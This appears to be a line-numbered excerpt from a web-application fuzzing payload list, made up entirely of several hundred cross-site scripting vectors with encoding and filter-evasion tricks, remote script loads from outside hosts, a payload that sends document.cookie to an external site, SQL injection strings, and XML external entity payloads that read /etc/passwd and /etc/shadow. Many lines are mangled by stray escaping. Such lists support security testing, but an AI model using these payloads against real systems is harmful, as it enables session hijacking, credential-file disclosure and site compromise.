<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
|
|
2487
|
+
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
|
|
2488
|
+
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
|
|
2489
|
+
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
|
|
2490
|
+
\";;alert(';XSS';);//
|
|
2491
|
+
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
|
|
2492
|
+
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
|
|
2493
|
+
<;IMG SRC=";jav	ascript:alert(';XSS';);";>;
|
|
2494
|
+
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
|
|
2495
|
+
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
|
|
2496
|
+
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
|
|
2497
|
+
<;IMG
SRC
=
";
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

';
X
S
S
';
)
";
>;
|
|
2498
|
+
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
|
|
2499
|
+
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
|
|
2500
|
+
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
|
|
2501
|
+
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2502
|
+
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
|
|
2503
|
+
<;SCRIPT SRC=http://ha.ckers.org/xss.js
|
|
2504
|
+
<;SCRIPT SRC=//ha.ckers.org/.j>;
|
|
2505
|
+
<;IMG SRC=";javascript:alert(';XSS';)";
|
|
2506
|
+
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
|
|
2507
|
+
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
|
|
2508
|
+
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
|
|
2509
|
+
<;SCRIPT>;a=/XSS/
|
|
2510
|
+
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2511
|
+
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2512
|
+
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2513
|
+
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2514
|
+
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2515
|
+
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2516
|
+
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
|
|
2517
|
+
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
|
|
2518
|
+
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
|
|
2519
|
+
<;A HREF=";http://1113982867/";>;XSS<;/A>;
|
|
2520
|
+
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
|
|
2521
|
+
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
|
|
2522
|
+
<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
|
|
2523
|
+
<;A HREF=";//www.google.com/";>;XSS<;/A>;
|
|
2524
|
+
<;A HREF=";//google";>;XSS<;/A>;
|
|
2525
|
+
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
|
|
2526
|
+
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
|
|
2527
|
+
<;A HREF=";http://google.com/";>;XSS<;/A>;
|
|
2528
|
+
<;A HREF=";http://www.google.com./";>;XSS<;/A>;
|
|
2529
|
+
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
|
|
2530
|
+
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
|
|
2531
|
+
<script>document.vulnerable=true;</script>
|
|
2532
|
+
<img SRC="jav ascript:document.vulnerable=true;">
|
|
2533
|
+
<img SRC="javascript:document.vulnerable=true;">
|
|
2534
|
+
<img SRC="  javascript:document.vulnerable=true;">
|
|
2535
|
+
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
|
|
2536
|
+
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
|
|
2537
|
+
<script <B>document.vulnerable=true;</script>
|
|
2538
|
+
<img SRC="javascript:document.vulnerable=true;"
|
|
2539
|
+
<iframe src="javascript:document.vulnerable=true; <
|
|
2540
|
+
<script>a=/XSS/\ndocument.vulnerable=true;</script>
|
|
2541
|
+
\";document.vulnerable=true;;//
|
|
2542
|
+
</title><SCRIPT>document.vulnerable=true;</script>
|
|
2543
|
+
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
|
|
2544
|
+
<body BACKGROUND="javascript:document.vulnerable=true;">
|
|
2545
|
+
<body ONLOAD=document.vulnerable=true;>
|
|
2546
|
+
<img DYNSRC="javascript:document.vulnerable=true;">
|
|
2547
|
+
<img LOWSRC="javascript:document.vulnerable=true;">
|
|
2548
|
+
<bgsound SRC="javascript:document.vulnerable=true;">
|
|
2549
|
+
<br SIZE="&{document.vulnerable=true}">
|
|
2550
|
+
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
|
|
2551
|
+
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
|
|
2552
|
+
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
|
|
2553
|
+
<img SRC='vbscript:document.vulnerable=true;'>
|
|
2554
|
+
1script3document.vulnerable=true;1/script3
|
|
2555
|
+
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
|
|
2556
|
+
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
|
|
2557
|
+
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
|
|
2558
|
+
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
|
|
2559
|
+
<table BACKGROUND="javascript:document.vulnerable=true;">
|
|
2560
|
+
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
|
|
2561
|
+
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
|
|
2562
|
+
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
|
|
2563
|
+
<div STYLE="width: expression(document.vulnerable=true);">
|
|
2564
|
+
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
|
|
2565
|
+
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
|
|
2566
|
+
<XSS STYLE="xss:expression(document.vulnerable=true)">
|
|
2567
|
+
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
|
|
2568
|
+
<style TYPE="text/javascript">document.vulnerable=true;</style>
|
|
2569
|
+
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
|
|
2570
|
+
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
|
|
2571
|
+
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
|
|
2572
|
+
<base HREF="javascript:document.vulnerable=true;//">
|
|
2573
|
+
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
|
|
2574
|
+
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
|
|
2575
|
+
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
|
|
2576
|
+
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
|
|
2577
|
+
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
|
|
2578
|
+
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
|
|
2579
|
+
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
|
|
2580
|
+
<a href="javascript#document.vulnerable=true;">
|
|
2581
|
+
<div onmouseover="document.vulnerable=true;">
|
|
2582
|
+
<img src="javascript:document.vulnerable=true;">
|
|
2583
|
+
<img dynsrc="javascript:document.vulnerable=true;">
|
|
2584
|
+
<input type="image" dynsrc="javascript:document.vulnerable=true;">
|
|
2585
|
+
<bgsound src="javascript:document.vulnerable=true;">
|
|
2586
|
+
&<script>document.vulnerable=true;</script>
|
|
2587
|
+
&{document.vulnerable=true;};
|
|
2588
|
+
<img src=&{document.vulnerable=true;};>
|
|
2589
|
+
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
|
|
2590
|
+
<iframe src="vbscript:document.vulnerable=true;">
|
|
2591
|
+
<img src="mocha:document.vulnerable=true;">
|
|
2592
|
+
<img src="livescript:document.vulnerable=true;">
|
|
2593
|
+
<a href="about:<script>document.vulnerable=true;</script>">
|
|
2594
|
+
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
|
|
2595
|
+
<body onload="document.vulnerable=true;">
|
|
2596
|
+
<div style="background-image: url(javascript:document.vulnerable=true;);">
|
|
2597
|
+
<div style="behaviour: url([link to code]);">
|
|
2598
|
+
<div style="binding: url([link to code]);">
|
|
2599
|
+
<div style="width: expression(document.vulnerable=true;);">
|
|
2600
|
+
<style type="text/javascript">document.vulnerable=true;</style>
|
|
2601
|
+
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
|
|
2602
|
+
<style><!--</style><script>document.vulnerable=true;//--></script>
|
|
2603
|
+
<<script>document.vulnerable=true;</script>
|
|
2604
|
+
<![<!--]]<script>document.vulnerable=true;//--></script>
|
|
2605
|
+
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
|
|
2606
|
+
<img src="blah"onmouseover="document.vulnerable=true;">
|
|
2607
|
+
<img src="blah>" onmouseover="document.vulnerable=true;">
|
|
2608
|
+
<xml src="javascript:document.vulnerable=true;">
|
|
2609
|
+
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
|
|
2610
|
+
<div datafld="b" dataformatas="html" datasrc="#X"></div>
|
|
2611
|
+
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
|
|
2612
|
+
<style>@import'http://www.securitycompass.com/xss.css';</style>
|
|
2613
|
+
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
|
|
2614
|
+
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
|
|
2615
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
|
|
2616
|
+
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
|
|
2617
|
+
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
|
|
2618
|
+
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
|
|
2619
|
+
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2620
|
+
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2621
|
+
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2622
|
+
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2623
|
+
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2624
|
+
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2625
|
+
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2626
|
+
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
|
|
2627
|
+
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
|
|
2628
|
+
<;/script>;<;script>;alert(1)<;/script>;
|
|
2629
|
+
<;/br style=a:expression(alert())>;
|
|
2630
|
+
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
|
|
2631
|
+
<;br size=\";&;{alert('XSS')}\";>;
|
|
2632
|
+
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out
|
|
2633
|
+
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out
|
|
2634
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2635
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
|
|
2636
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2637
|
+
<~/XSS STYLE=xss:expression(alert('XSS'))>
|
|
2638
|
+
"><script>alert('XSS')</script>
|
|
2639
|
+
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2640
|
+
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2641
|
+
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2642
|
+
</XSS STYLE=xss:expression(alert('XSS'))>
|
|
2643
|
+
>"><script>alert("XSS")</script>&
|
|
2644
|
+
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
|
|
2645
|
+
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
|
|
2646
|
+
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
|
|
2647
|
+
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
|
|
2648
|
+
'';!--"<XSS>=&{()}
|
|
2649
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
2650
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2651
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
2652
|
+
<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>
|
|
2653
|
+
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
|
|
2654
|
+
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
|
|
2655
|
+
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
|
|
2656
|
+
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
|
2657
|
+
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
|
2658
|
+
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
|
2659
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
|
2660
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
|
|
2661
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
|
|
2662
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
|
|
2663
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
|
|
2664
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
|
|
2665
|
+
<script>alert('XSS')</script>
|
|
2666
|
+
%3cscript%3ealert('XSS')%3c/script%3e
|
|
2667
|
+
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
|
|
2668
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
2669
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
2670
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2671
|
+
<img src=xss onerror=alert(1)>
|
|
2672
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
2673
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
2674
|
+
<IMG SRC="jav ascript:alert('XSS');">
|
|
2675
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
|
2676
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2677
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2678
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2679
|
+
<BODY BACKGROUND="javascript:alert('XSS')">
|
|
2680
|
+
<BODY ONLOAD=alert('XSS')>
|
|
2681
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
2682
|
+
<IMG SRC="javascript:alert('XSS')"
|
|
2683
|
+
<iframe src=http://ha.ckers.org/scriptlet.html <
|
|
2684
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
2685
|
+
%253cscript%253ealert(1)%253c/script%253e
|
|
2686
|
+
"><s"%2b"cript>alert(document.cookie)</script>
|
|
2687
|
+
foo<script>alert(1)</script>
|
|
2688
|
+
<scr<script>ipt>alert(1)</scr</script>ipt>
|
|
2689
|
+
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
|
|
2690
|
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
2691
|
+
<marquee onstart='javascript:alert('1');'>=(◕_◕)=
|